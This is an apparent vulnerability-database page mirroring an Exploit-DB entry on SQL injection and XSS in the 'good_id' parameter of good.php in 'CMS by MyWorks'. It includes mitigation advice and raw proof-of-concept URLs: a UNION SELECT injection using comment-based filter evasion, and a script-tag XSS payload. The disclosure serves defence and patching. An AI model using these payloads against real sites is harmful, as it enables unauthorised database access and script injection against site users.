CMS by MyWorks SQL/ XSS Vulnerability

vendor:

CMS

by:

Palyo34

8,8

CVSS

HIGH

SQL Injection and XSS

89, 79

CWE

Product Name: CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

CMS by MyWorks SQL/ XSS Vulnerability

The vulnerability exists in the 'good.php' script, which is vulnerable to SQL injection and XSS attacks. An attacker can inject malicious SQL code into the 'good_id' parameter to execute arbitrary SQL commands on the underlying database. An attacker can also inject malicious JavaScript code into the 'good_id' parameter to execute arbitrary JavaScript code on the vulnerable web page.

Mitigation:

Input validation should be used to prevent SQL injection and XSS attacks. The application should also be configured to use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

CMS by MyWorks SQL/ XSS Vulnerability  
========================================================  
    
####################################################################  
# Author : Palyo34

# Home   : www.1923Turk.com 

# Script : CMS by MyWorks 
 
# Script site: http://www.myworks.spb.ru/                
    
####################################################################  
    
===[ Exploit ]===  
    
http://server/catalog/good.php?good_id= SQL INJECTION 
    
  1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12
  
Demo: 
  
http://server/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12
  
     
###################################################################


===[XSS Vulnerability]=== 


http://server/catalog/good.php?good_id=


http://server/catalog/good.php?good_id=164<script>alert("XSS")</script>